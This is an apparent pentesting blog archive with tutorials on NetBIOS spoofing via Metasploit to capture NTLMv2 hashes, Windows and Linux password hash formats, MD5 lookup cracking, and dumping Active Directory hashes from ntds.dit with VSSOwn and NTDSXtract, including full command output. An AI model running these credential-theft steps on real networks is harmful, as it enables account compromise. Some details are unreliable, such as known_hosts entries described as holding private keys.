Tag Archive: hashes

NetBIOS spoofing

There have been several posts regarding NetBIOS spoofing, and i thought i would write something up regarding it.

When a windows machine tries to access a resource on the network it will try and resolve the name of the resource to an IP address. It does this by first searching it’s host file, and if that fails (and generally does), it will then try DNS. Well DNS doesnt have records for everything, so the windows machine tries NetBIOS and if you dont have a WINS server setup, it will send a broadcast message asking if anyone knows about that resource. Perfect, we can respond with a machine that we control.

How often to machines fall back to NetBIOS queries? Laptops that are part of a domain on a different wireless network often query for resources. Often companies have a internal website configured. Also most web browsers when you perform a search they have to determine if you are trying to access a local resource or performing a search.

msf  auxiliary(smb) > use auxiliary/spoof/nbns/nbns_response
msf  auxiliary(nbns_response) > show options

Module options (auxiliary/spoof/nbns/nbns_response):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   REGEX      .*               yes       Regex applied to the NB Name to determine if spoofed reply is sent
   SPOOFIP    yes       IP address with which to poison responses
   TIMEOUT    500              yes       The number of seconds to wait for new data

msf  auxiliary(nbns_response) > run
[*] Auxiliary module execution completed

[*] NBNS Spoofer started. Listening for NBNS requests...
msf  auxiliary(nbns_response) > use auxiliary/server/capture/smb
msf  auxiliary(smb) > show options

Module options (auxiliary/server/capture/smb):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte challenge
   JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format
   SRVHOST           yes       The local host to listen on. This must be an address on the local machine or
   SRVPORT     445               yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

msf  auxiliary(smb) > set JOHNPWFILE /pentest/passwords/wordlists/darkc0de.lst
JOHNPWFILE => /pentest/passwords/wordlists/darkc0de.lst
msf  auxiliary(smb) > run
[*] Auxiliary module execution completed

[*] Server started.
msf  auxiliary(smb) > [*] 2012-01-29 09:45:40 -0500
NTLMv2 Response Captured from
USER:keith DOMAIN:cheeze-it OS: LM:
NTHASH:******hash************* NT_CLIENT_CHALLENGE:****************************************************

SSH KnownHosts

When you SSH into a server for whatever reason Linux systems store the machine name/IP address and the private key. It does this so if you get prompted for the public key again then either you are compromised and are part of a man in the middle attack, or the private key on the server has changed. This information is stored in your user profile under .ssh/known_hosts

For an pentester this information could be useful. If your password is compromised an attacker can look at this file and see what machines you have ssh’ed into, would they be able to get into using the same username and password? Possibly. SSH has a new feature where it will hash each entry. To do so put ‘HashKnownHosts yes’ in .ssh/config or in /etc/ssh/ssh_config (for all users). Then run ‘ssh-keygen -H’ to hash your current entries.

The ‘|’ are separators, everything between them represent a value. The first is the hash_magic, i’m not really sure what that is for. the 2nd is the salt which is encoded in base 64, the 3rd is the hashed IP/Hostname, and the last is the private key for the host. The Hostname/IP is encoded using SHA1 and the salt, then encoded in base 64.


I’ve been wanting to do this for a while, but never got around to it. This is a list of common operating systems and the password hashing algorithms they use. This list is by no means comprehensive.

LM HASH (Lan Manager)
Windows NT to Windows 2003 systems store both LM HASH and NT HASH, starting in Windows Vista one is disabled. LM Hash is not really a hash, “A hash is a mathematical function used to summarize or probabilistically identify data. LM instead uses a cryptographic one-way function (OWF). Instead of encrypting the password with some other key, the password itself is the key.” The Hash is generated by:

  1. Convert all lower case characters in the password to upper case, thus it’s case insensitive
  2. Pad the password with NULL characters until it is exactly 14 characters long, anything after is trimmed
  3. Split the password into two 7 character chunks
  4. Use each chunk separately as a DES key to encrypt a specific string (KGS!@#$%).
  5. Concatenate the two cipher texts into a 128-bit string and store the result

LMHASH passwords are limited on the characters that can be used, common alphanumeric set only. This hash is stored in the SAM file.

This hash is also pretty basic, the hash is generated by converting the password to Unicode, then create a MD4 hash using that text. This password hash is also stored in the SAM file.

By default on Windows Systems on an Active Directory domain, the last 10 users to login to the systems credentials are cached on the system, and are stored using the MSCache hash. These hashes are stored in the Registry, under HKEY_LOCAL_MACHINESECURITYCACHENL$1 through NL$10. In order to view them you need to have system rights, or you have to change the ACL to view them. These hashes are generated by:

  1. NTLM Algorithm is applied to the password
  2. Convert the username lowercase and to unicode
  3. Combine 1 and 2 and generate a MD4 hash

Was released with Windows Vista is an improvement over MSCACHE. It is generated by:

  1. MSCACHE is applied
  2. Apply PBKDF2 with SHA1 as HMAC, an iteration count of 10240, the old DCC hash as password and the Unicode username as salt in order to generate the DCC2 (MSCash2) hash. Only the first 128 bits of the resulting 160 bits are used.

Active Directory
Good write-up is available here

It depends on how you have your system configured, but most distributions use MD5 with a salt. If you look at your /etc/shadow file you will see something like the following:
We are only concerned with what is after root:. The first $ represents the hashing algorithm. 1 is for MD5, 2 is for Blowfish, 5 is SHA-256, and 6 is SHA-512. The next $ is the salt, then finally the password hash. You can change it to whatever you want it to be by editing PAM or using the command authconfig. When changing your password the system uses the crypt library, and if you set it to a algorithm that the system doesnt support, it will default to MD5. GLIBC2 supports more hashing algorithms.
The salt is generated randomly (I think, couldnt really find much on this) and is used when creating the hash. Here is an example


MD5 Password Cracking

Password hashes can take a long time to crack, depending on the hash and the complexity of the password. Why spend all that time cracking a password, when someone else has already done the work? Introducing BozoCrack. BozoCrack is a ruby script that will search google for a MD5 hash and if google has it, bozocrack will return the plain text password.

Description from Bozocrack

“BozoCrack is a depressingly effective MD5 password hash cracker with almost zero CPU/GPU load. Instead of rainbow tables, dictionaries, or brute force, BozoCrack simply finds the plaintext password. Specifically, it googles the MD5 hash and hopes the plaintext appears somewhere on the first page of results.”


root@bt:~# ruby /pentest/passwords/bozocrack/bozocrack.rb md5.txt
Loaded 6 unique hashes

Active Directory Password Dump

So I’ve seen a few posts on dumping password hashes from active directory. So the concept is pretty simple, you use VSS (Volume Shadow Copy) to copy the SYSTEM and ntds.dit files, then you can use a tool written by Csaba Barta to extract the hashes. Since VSS is enabled by default on 2008, this should be pretty simple. There is a VBScript out that will do this for you, it’s called VSSOwn. I was able to create copies of the SYSTEM and ntds.dit files, but was not able to extract the hashes, why? Csaba Barta’s tool doesnt currently work with 64bit systems, bummer. Since i dont have a 32bit version to test with i’m out of luck. Anyway a nice write-up is available here

Update –

Decided to try it again, since a 64-bit version of the tool was released. So first run

cscript vssown.vbs /create

To create the volume shadow copy then run

cscript vssown.vbs /list

To confirmed that it worked, then copy the SYSTEM and ntds.dit files.

Download libesedb and NTDXtract (current version is 1.0).

Then run the following:

root@bt:~# cd libesedb-20120102/ 
root@bt:~/libesedb-20120102# ./configure  && make

Lots of text scrolls by ūüôā

root@bt:~/libesedb-20120102# cd esedbtools/ 
root@bt:~/libesedb-20120102/esedbtools# ./esedbexport /root/ntds.dit esedbexport 20120102 Opening file. 
Exporting table 1 (MSysObjects) out of 12. 
Exporting table 2 (MSysObjectsShadow) out of 12. 
Exporting table 3 (MSysUnicodeFixupVer2) out of 12. 
Exporting table 4 (datatable) out of 12. 
Exporting table 5 (hiddentable) out of 12. 
Exporting table 6 (link_table) out of 12. 
Exporting table 7 (sdpropcounttable) out of 12. 
Exporting table 8 (sdproptable) out of 12. 
Exporting table 9 (sd_table) out of 12. 
Exporting table 10 (MSysDefrag2) out of 12. 
Exporting table 11 (quota_table) out of 12. 
Exporting table 12 (quota_rebuild_progress_table) out of 12. 
Export completed. 
root@bt:~/libesedb-20120102/esedbtools# cd ntds.dit.export/ 
root@bt:~/libesedb-20120102/esedbtools/ntds.dit.export# ls 
root@bt:~/libesedb-20120102/esedbtools/ntds.dit.export# cp datatable.3 /root 
root@bt:~/libesedb-20120102/esedbtools/ntds.dit.export# cp link_table.5 /root 

Now we can use dsusers.py to extract the hashes

 root@bt:~/NTDSXtract 1.0# python ./dsusers.py /root/datatable.3 /root/link_table.5 --passwordhashes /root/SYSTEM 
Running with options: Extracting password hashes Initialising engine... 
Scanning database - 100% -> 3491 records processed 
Extracting schema information - 100% -> 1549 records processed 
Extracting object links... 
List of users: ============== 
Record ID:           3562 
User name:           Administrator 
User principal name: 
SAM Account name:    Administrator 
GUID: aa7020f0-d702-4608-bb51-4f9901113317 
SID:  S-1-5-21-2539783424-2987255661-3794136379-500 
When created:         2011-09-18 16:19:03 
When changed:         2012-02-05 15:24:36 
Account expires:      Never 
Password last set:    2012-02-05 15:24:36.328125 
Last logon:           2012-02-05 15:25:12.078125 
Last logon timestamp: 2012-02-05 15:24:36.328125 
Bad password time     2012-02-05 15:23:29.375000 
Logon count:          25 
Bad password count:   0 
User Account Control: NORMAL_ACCOUNT 
Ancestors: $ROOT_OBJECT$ us keithsoffice 
Users Administrator 
Password hashes: Administrator:$NT$9bff06fe611486579fb74037890fda96::: 
Record ID:           3563 
User name:           Guest 
User principal name: 
SAM Account name:    Guest 
GUID: 01b08029-af28-4f0b-a6be-e39a9eff6bfa 
SID:  S-1-5-21-2539783424-2987255661-3794136379-501 
When created:         2011-09-18 16:19:04 
When changed:         2011-09-18 16:19:04 
Account expires:      Never 
Password last set:    Never 
Last logon:           Never 
Last logon timestamp: Never 
Bad password time     Never 
Logon count:          0 
Bad password count:   0 
User Account Control: Disabled 
PWD Not Required NORMAL_ACCOUNT PWD Never Expires 
Ancestors: $ROOT_OBJECT$ us keithsoffice 
Users Guest 
Password hashes: 
Record ID:           3609 
User name:           krbtgt 
User principal name: 
SAM Account name:    krbtgt 
GUID: 290688a7-60a4-4baa-b860-33eda516793a 
SID:  S-1-5-21-2539783424-2987255661-3794136379-502 
When created:         2011-09-18 16:22:35 
When changed:         2011-09-18 16:37:59 
Account expires:      Never 
Password last set:    2011-09-18 16:22:35.843750 
Last logon:           Never 
Last logon timestamp: Never 
Bad password time     Never 
Logon count:          0 
Bad password count:   0 
User Account Control: Disabled 
Ancestors: $ROOT_OBJECT$ us keithsoffice 
Users krbtgt 
Password hashes: krbtgt:$NT$ef9fde1c17c72af73beb84f7702724c9::: 
Record ID:           3763 
User name:           keith 
User principal name: keith@keithsoffice.us 
SAM Account name:    keith 
GUID: 74f63277-6bed-42ea-bdd9-4c9498c2f1d3 
SID:  S-1-5-21-2539783424-2987255661-3794136379-1103 
When created:         2011-09-18 16:57:38 
When changed:         2012-02-05 15:23:54 
Account expires:      Never 
Password last set:    2012-02-05 15:23:54.203125 
Last logon:           2012-02-05 15:23:55.812500 
Last logon timestamp: 2012-02-05 15:23:54.187500 
Bad password time     2011-12-11 04:24:51.625875 
Logon count:          15 
Bad password count:   0 
User Account Control: NORMAL_ACCOUNT 
Ancestors: $ROOT_OBJECT$ us keithsoffice 
Users keith 
Password hashes: keith:$NT$8c3efc486704d2ee71eebe71af14d86c::: 
Record ID:           3764 
User name:           keith domain admin 
User principal name: keith-dm@keithsoffice.us 
SAM Account name:    keith-dm 
GUID: 7fbe82fd-eb65-4862-8626-d2127add7283 
SID:  S-1-5-21-2539783424-2987255661-3794136379-1104 
When created:         2011-09-18 16:58:24 
When changed:         2011-10-04 01:58:23 
Account expires:      Never 
Password last set:    2011-10-04 01:57:08.171875 
Last logon:           2011-10-04 02:01:29.359375 
Last logon timestamp: 2011-10-04 01:58:23.781250 
Bad password time     2011-09-18 20:54:49.250000 
Logon count:          9 
Bad password count:   0 
User Account Control: NORMAL_ACCOUNT 
Ancestors: $ROOT_OBJECT$ us keithsoffice 
Users keith domain admin 
Password hashes: keith domain admin:$NT$58a478135a93ac3bf058a5ea0e8fdb71::: 

Have Fun!

Sources: http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html